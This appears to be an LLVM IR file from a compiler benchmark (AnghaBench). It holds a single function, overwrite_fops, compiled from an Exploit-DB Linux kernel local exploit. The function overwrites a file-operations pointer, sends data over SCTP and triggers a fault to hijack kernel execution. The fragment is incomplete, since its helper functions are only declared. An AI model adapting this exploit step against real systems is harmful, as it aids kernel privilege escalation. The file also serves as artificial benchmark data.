; ModuleID = '/home/carl/AnghaBench/exploitdb/exploits/linux_x86-64/local/extr_9083.c_overwrite_fops.c'
source_filename = "/home/carl/AnghaBench/exploitdb/exploits/linux_x86-64/local/extr_9083.c_overwrite_fops.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

%struct.sockaddr_in = type { i32 }

@highpage = common dso_local global i32 0, align 4
@STRUCT_PAGE_ALT = common dso_local global i64 0, align 8
@fops = common dso_local global i32 0, align 4
@llvm.used = appending global [1 x i8*] [i8* bitcast (void (i32, %struct.sockaddr_in*, i32)* @overwrite_fops to i8*)], section "llvm.metadata"

; Function Attrs: noinline nounwind optnone uwtable
define internal void @overwrite_fops(i32 %0, %struct.sockaddr_in* %1, i32 %2) #0 {
  %4 = alloca i32, align 4
  %5 = alloca %struct.sockaddr_in*, align 8
  %6 = alloca i32, align 4
  %7 = alloca i8*, align 8
  %8 = alloca i32*, align 8
  store i32 %0, i32* %4, align 4
  store %struct.sockaddr_in* %1, %struct.sockaddr_in** %5, align 8
  store i32 %2, i32* %6, align 4
  store i8* null, i8** %7, align 8
  %9 = load i32, i32* @highpage, align 4
  %10 = icmp ne i32 %9, 0
  br i1 %10, label %14, label %11

11:                                               ; preds = %3
  %12 = load i8*, i8** %7, align 8
  %13 = getelementptr inbounds i8, i8* %12, i32 1
  store i8* %13, i8** %7, align 8
  br label %17

14:                                               ; preds = %3
  %15 = load i64, i64* @STRUCT_PAGE_ALT, align 8
  %16 = inttoptr i64 %15 to i8*
  store i8* %16, i8** %7, align 8
  br label %17

17:                                               ; preds = %14, %11
  %18 = load i8*, i8** %7, align 8
  %19 = bitcast i8* %18 to i32*
  store i32* %19, i32** %8, align 8
  %20 = load i32, i32* @fops, align 4
  %21 = load i32*, i32** %8, align 8
  store i32 %20, i32* %21, align 4
  %22 = load i32, i32* %4, align 4
  %23 = load %struct.sockaddr_in*, %struct.sockaddr_in** %5, align 8
  %24 = call i32 @write_sctp(i32 %22, %struct.sockaddr_in* %23, i32 1)
  %25 = call i32 @sleep(i32 1)
  %26 = call i32 (...) @trigger_fault()
  ret void
}

declare dso_local i32 @write_sctp(i32, %struct.sockaddr_in*, i32) #1

declare dso_local i32 @sleep(i32) #1

declare dso_local i32 @trigger_fault(...) #1


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
